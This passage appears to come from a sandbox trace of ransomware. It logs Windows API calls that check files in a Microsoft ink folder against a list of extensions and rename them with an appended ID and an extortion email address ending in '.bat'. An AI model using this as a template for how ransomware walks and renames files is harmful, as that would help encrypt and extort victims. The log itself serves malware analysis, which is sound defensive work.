shared\\ink\\hwrcommonlm.dat") returned 66 [0179.006] lstrlenW (lpString=".jpg") returned 4 [0179.006] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0179.006] lstrcmpiW (lpString1=".dat", lpString2=".bat") returned 1 [0179.006] lstrlenW (lpString="hwrenclm.dat") returned 12 [0179.006] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0179.007] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=498624) returned 1 [0179.007] CloseHandle (hObject=0x340) returned 1 [0179.007] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat")) returned 0x20 [0179.007] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.007] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 63 [0179.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 63 [0179.007] lstrlenW (lpString=".doc") returned 4 [0179.007] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0179.007] lstrlenW (lpString=".docx") returned 5 [0179.007] lstrcmpiW (lpString1=".docx", lpString2="m.dat") returned -1 [0179.007] lstrlenW (lpString=".pdf") returned 4 [0179.007] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0179.007] lstrlenW (lpString=".xls") returned 4 [0179.007] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0179.007] lstrlenW (lpString=".xlsx") returned 5 [0179.007] lstrcmpiW (lpString1=".xlsx", lpString2="m.dat") returned -1 [0179.007] lstrlenW (lpString=".ppt") returned 4 [0179.007] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0179.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 63 [0179.008] lstrlenW (lpString=".zip") returned 4 [0179.008] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0179.008] lstrlenW (lpString=".rar") returned 4 [0179.008] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0179.008] lstrlenW (lpString=".bz2") returned 4 [0179.008] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0179.008] lstrlenW (lpString=".7z") returned 3 [0179.008] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0179.008] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 63 [0179.008] lstrlenW (lpString=".dbf") returned 4 [0179.008] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0179.008] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 63 [0179.008] lstrlenW (lpString=".1cd") returned 4 [0179.008] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0179.008] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 63 [0179.008] lstrlenW (lpString=".jpg") returned 4 [0179.008] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0179.008] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 63 [0179.008] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 63 [0179.008] lstrlenW (lpString=".doc") returned 4 [0179.008] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0179.008] lstrlenW (lpString=".docx") returned 5 [0179.008] lstrcmpiW (lpString1=".docx", lpString2="m.dat") returned -1 [0179.008] lstrlenW (lpString=".pdf") returned 4 [0179.008] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0179.008] lstrlenW (lpString=".xls") returned 4 [0179.009] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0179.009] lstrlenW (lpString=".xlsx") returned 5 [0179.009] lstrcmpiW (lpString1=".xlsx", lpString2="m.dat") returned -1 [0179.009] lstrlenW (lpString=".ppt") returned 4 [0179.009] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0179.009] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 63 [0179.009] lstrlenW (lpString=".zip") returned 4 [0179.009] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0179.009] lstrlenW (lpString=".rar") returned 4 [0179.009] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0179.009] lstrlenW (lpString=".bz2") returned 4 [0179.009] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0179.009] lstrlenW (lpString=".7z") returned 3 [0179.009] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0179.009] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 63 [0179.009] lstrlenW (lpString=".dbf") returned 4 [0179.009] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0179.009] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 63 [0179.009] lstrlenW (lpString=".1cd") returned 4 [0179.009] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0179.009] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 63 [0179.009] lstrlenW (lpString=".jpg") returned 4 [0179.009] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0179.009] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x7709f0, Size=0x2000) returned 0x7709f0 [0179.010] lstrcmpiW (lpString1=".dat", lpString2=".bat") returned 1 [0179.010] lstrlenW (lpString="hwrlatinlm.dat") returned 14 [0179.010] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0179.010] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=1100592) returned 1 [0179.010] CloseHandle (hObject=0x340) returned 1 [0179.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat")) returned 0x20 [0179.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.010] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 65 [0179.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 65 [0179.011] lstrlenW (lpString=".doc") returned 4 [0179.011] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0179.011] lstrlenW (lpString=".docx") returned 5 [0179.011] lstrcmpiW (lpString1=".docx", lpString2="m.dat") returned -1 [0179.011] lstrlenW (lpString=".pdf") returned 4 [0179.011] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0179.011] lstrlenW (lpString=".xls") returned 4 [0179.011] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0179.011] lstrlenW (lpString=".xlsx") returned 5 [0179.011] lstrcmpiW (lpString1=".xlsx", lpString2="m.dat") returned -1 [0179.011] lstrlenW (lpString=".ppt") returned 4 [0179.011] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0179.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 65 [0179.011] lstrlenW (lpString=".zip") returned 4 [0179.011] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0179.011] lstrlenW (lpString=".rar") returned 4 [0179.011] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0179.011] lstrlenW (lpString=".bz2") returned 4 [0179.011] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0179.011] lstrlenW (lpString=".7z") returned 3 [0179.011] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0179.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 65 [0179.011] lstrlenW (lpString=".dbf") returned 4 [0179.011] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0179.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 65 [0179.012] lstrlenW (lpString=".1cd") returned 4 [0179.012] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0179.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 65 [0179.012] lstrlenW (lpString=".jpg") returned 4 [0179.012] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0179.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 65 [0179.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 65 [0179.012] lstrlenW (lpString=".doc") returned 4 [0179.012] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0179.012] lstrlenW (lpString=".docx") returned 5 [0179.012] lstrcmpiW (lpString1=".docx", lpString2="m.dat") returned -1 [0179.012] lstrlenW (lpString=".pdf") returned 4 [0179.012] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0179.012] lstrlenW (lpString=".xls") returned 4 [0179.012] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0179.012] lstrlenW (lpString=".xlsx") returned 5 [0179.012] lstrcmpiW (lpString1=".xlsx", lpString2="m.dat") returned -1 [0179.012] lstrlenW (lpString=".ppt") returned 4 [0179.012] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0179.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 65 [0179.012] lstrlenW (lpString=".zip") returned 4 [0179.012] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0179.012] lstrlenW (lpString=".rar") returned 4 [0179.012] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0179.012] lstrlenW (lpString=".bz2") returned 4 [0179.012] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0179.013] lstrlenW (lpString=".7z") returned 3 [0179.013] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0179.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 65 [0179.013] lstrlenW (lpString=".dbf") returned 4 [0179.013] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0179.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 65 [0179.013] lstrlenW (lpString=".1cd") returned 4 [0179.013] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0179.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 65 [0179.013] lstrlenW (lpString=".jpg") returned 4 [0179.013] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0179.013] lstrcmpiW (lpString1=".dat", lpString2=".bat") returned 1 [0179.013] lstrlenW (lpString="hwrusalm.dat") returned 12 [0179.013] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0179.014] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=2515696) returned 1 [0179.014] CloseHandle (hObject=0x340) returned 1 [0179.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat")) returned 0x20 [0179.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.014] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0179.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 63 [0179.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 63 [0179.014] lstrlenW (lpString=".doc") returned 4 [0179.014] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0179.014] lstrlenW (lpString=".docx") returned 5 [0179.014] lstrcmpiW (lpString1=".docx", lpString2="m.dat") returned -1 [0179.014] lstrlenW (lpString=".pdf") returned 4 [0179.014] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0179.014] lstrlenW (lpString=".xls") returned 4 [0179.014] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0179.014] lstrlenW (lpString=".xlsx") returned 5 [0179.015] lstrcmpiW (lpString1=".xlsx", lpString2="m.dat") returned -1 [0179.015] lstrlenW (lpString=".ppt") returned 4 [0179.015] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0179.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 63 [0179.015] lstrlenW (lpString=".zip") returned 4 [0179.015] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0179.015] lstrlenW (lpString=".rar") returned 4 [0179.015] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0179.015] lstrlenW (lpString=".bz2") returned 4 [0179.015] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0179.015] lstrlenW (lpString=".7z") returned 3 [0179.015] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0179.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 63 [0179.015] lstrlenW (lpString=".dbf") returned 4 [0179.015] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0179.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 63 [0179.015] lstrlenW (lpString=".1cd") returned 4 [0179.015] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0179.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 63 [0179.015] lstrlenW (lpString=".jpg") returned 4 [0179.015] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0179.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 63 [0179.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 63 [0179.015] lstrlenW (lpString=".doc") returned 4 [0179.015] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0179.015] lstrlenW (lpString=".docx") returned 5 [0179.015] lstrcmpiW (lpString1=".docx", lpString2="m.dat") returned -1 [0179.016] lstrlenW (lpString=".pdf") returned 4 [0179.016] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0179.016] lstrlenW (lpString=".xls") returned 4 [0179.016] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0179.016] lstrlenW (lpString=".xlsx") returned 5 [0179.016] lstrcmpiW (lpString1=".xlsx", lpString2="m.dat") returned -1 [0179.016] lstrlenW (lpString=".ppt") returned 4 [0179.016] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0179.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 63 [0179.016] lstrlenW (lpString=".zip") returned 4 [0179.016] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0179.016] lstrlenW (lpString=".rar") returned 4 [0179.016] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0179.016] lstrlenW (lpString=".bz2") returned 4 [0179.016] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0179.016] lstrlenW (lpString=".7z") returned 3 [0179.016] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0179.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 63 [0179.016] lstrlenW (lpString=".dbf") returned 4 [0179.016] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0179.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 63 [0179.016] lstrlenW (lpString=".1cd") returned 4 [0179.016] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0179.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 63 [0179.016] lstrlenW (lpString=".jpg") returned 4 [0179.016] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0179.017] lstrcmpiW (lpString1=".dat", lpString2=".bat") returned 1 [0179.017] lstrlenW (lpString="hwrusash.dat") returned 12 [0179.017] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0179.017] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=3380096) returned 1 [0179.017] CloseHandle (hObject=0x340) returned 1 [0179.018] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat")) returned 0x20 [0179.018] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.018] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0179.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0179.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0179.018] lstrlenW (lpString=".doc") returned 4 [0179.018] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0179.018] lstrlenW (lpString=".docx") returned 5 [0179.018] lstrcmpiW (lpString1=".docx", lpString2="h.dat") returned -1 [0179.018] lstrlenW (lpString=".pdf") returned 4 [0179.018] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0179.018] lstrlenW (lpString=".xls") returned 4 [0179.018] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0179.018] lstrlenW (lpString=".xlsx") returned 5 [0179.018] lstrcmpiW (lpString1=".xlsx", lpString2="h.dat") returned -1 [0179.018] lstrlenW (lpString=".ppt") returned 4 [0179.018] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0179.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0179.018] lstrlenW (lpString=".zip") returned 4 [0179.019] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0179.019] lstrlenW (lpString=".rar") returned 4 [0179.019] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0179.019] lstrlenW (lpString=".bz2") returned 4 [0179.019] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0179.019] lstrlenW (lpString=".7z") returned 3 [0179.019] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0179.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0179.019] lstrlenW (lpString=".dbf") returned 4 [0179.019] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0179.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0179.019] lstrlenW (lpString=".1cd") returned 4 [0179.019] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0179.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0179.019] lstrlenW (lpString=".jpg") returned 4 [0179.019] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0179.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0179.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0179.019] lstrlenW (lpString=".doc") returned 4 [0179.019] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0179.019] lstrlenW (lpString=".docx") returned 5 [0179.019] lstrcmpiW (lpString1=".docx", lpString2="h.dat") returned -1 [0179.019] lstrlenW (lpString=".pdf") returned 4 [0179.019] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0179.019] lstrlenW (lpString=".xls") returned 4 [0179.019] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0179.019] lstrlenW (lpString=".xlsx") returned 5 [0179.019] lstrcmpiW (lpString1=".xlsx", lpString2="h.dat") returned -1 [0179.020] lstrlenW (lpString=".ppt") returned 4 [0179.020] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0179.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0179.020] lstrlenW (lpString=".zip") returned 4 [0179.020] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0179.020] lstrlenW (lpString=".rar") returned 4 [0179.020] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0179.020] lstrlenW (lpString=".bz2") returned 4 [0179.020] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0179.020] lstrlenW (lpString=".7z") returned 3 [0179.020] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0179.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0179.020] lstrlenW (lpString=".dbf") returned 4 [0179.020] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0179.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0179.020] lstrlenW (lpString=".1cd") returned 4 [0179.020] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0179.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0179.020] lstrlenW (lpString=".jpg") returned 4 [0179.020] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0179.020] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.020] lstrlenW (lpString="ipsar.xml") returned 9 [0179.020] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0179.022] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=2418) returned 1 [0179.022] CloseHandle (hObject=0x340) returned 1 [0179.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml")) returned 0x20 [0179.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.022] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0179.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0179.022] lstrlenW (lpString=".doc") returned 4 [0179.022] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0179.022] lstrlenW (lpString=".docx") returned 5 [0179.022] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0179.023] lstrlenW (lpString=".pdf") returned 4 [0179.023] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0179.023] lstrlenW (lpString=".xls") returned 4 [0179.023] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0179.023] lstrlenW (lpString=".xlsx") returned 5 [0179.023] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0179.023] lstrlenW (lpString=".ppt") returned 4 [0179.023] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0179.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0179.023] lstrlenW (lpString=".zip") returned 4 [0179.023] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0179.023] lstrlenW (lpString=".rar") returned 4 [0179.023] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0179.023] lstrlenW (lpString=".bz2") returned 4 [0179.023] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0179.023] lstrlenW (lpString=".7z") returned 3 [0179.023] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0179.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0179.023] lstrlenW (lpString=".dbf") returned 4 [0179.023] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0179.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") 